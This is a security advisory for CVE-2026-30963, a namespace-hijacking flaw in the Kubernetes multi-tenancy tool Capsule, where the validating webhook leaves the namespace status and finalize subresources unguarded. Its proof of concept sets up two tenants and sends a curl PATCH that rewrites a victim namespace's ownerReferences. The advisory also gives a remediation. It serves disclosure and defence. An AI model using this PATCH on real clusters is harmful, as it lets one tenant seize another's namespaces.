CVE-2026-30963
Capsule Namespace Hijacking via subresource
Description
### Summary To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. The webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking. ### Details When Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, it does not intercept modification requests initiated through namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through subresource APIs, it is still possible to modify the metadata field of a namespace resource, enabling hijacking. ### PoC Open two terminals and create two tenants: ``` kubectl create -f - << EOF apiVersion: capsule.clastix.io/v1beta2 kind: Tenant metadata: name: oil spec: owners: - name: alice kind: User EOF ./hack/create-user.sh alice solar export KUBECONFIG=alice-solar.kubeconfig kubectl create namespace solar-production # alice creates the namespace ``` ``` kubectl create -f - << EOF apiVersion: capsule.clastix.io/v1beta2 kind: Tenant metadata: name: attacker spec: owners: - name: attacker kind: User EOF ./hack/create-user.sh attacker attacker export KUBECONFIG=attacker-attacker.kubeconfig ``` When the attacker has permission to modify namespace/status or namespace/finalize, they can hijack other namespaces. Here we grant the attacker the relevant permissions: ``` kubectl create clusterrole status --verb=patch --resource=namespaces/status kubectl create clusterrolebinding status --clusterrole=status --user=attacker ``` The attacker then sends a PATCH request to namespace/status to hijack the namespace created by alice: ``` curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \ --header 'Content-Type: application/json-patch+json' \ --data '[ { "op": "replace", "path": "/metadata/ownerReferences", "value": [ { "apiVersion": "capsule.clastix.io/v1beta2", "kind": "Tenant", "name": "attacker", "uid": "1fcb9c9b-b552-4974-a248-32be66a2188c" } ] } ]' ``` ### Impact hijack namespace ### Remediation To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules: ``` resources: - namespaces - namespaces/status - namespace/finalize ```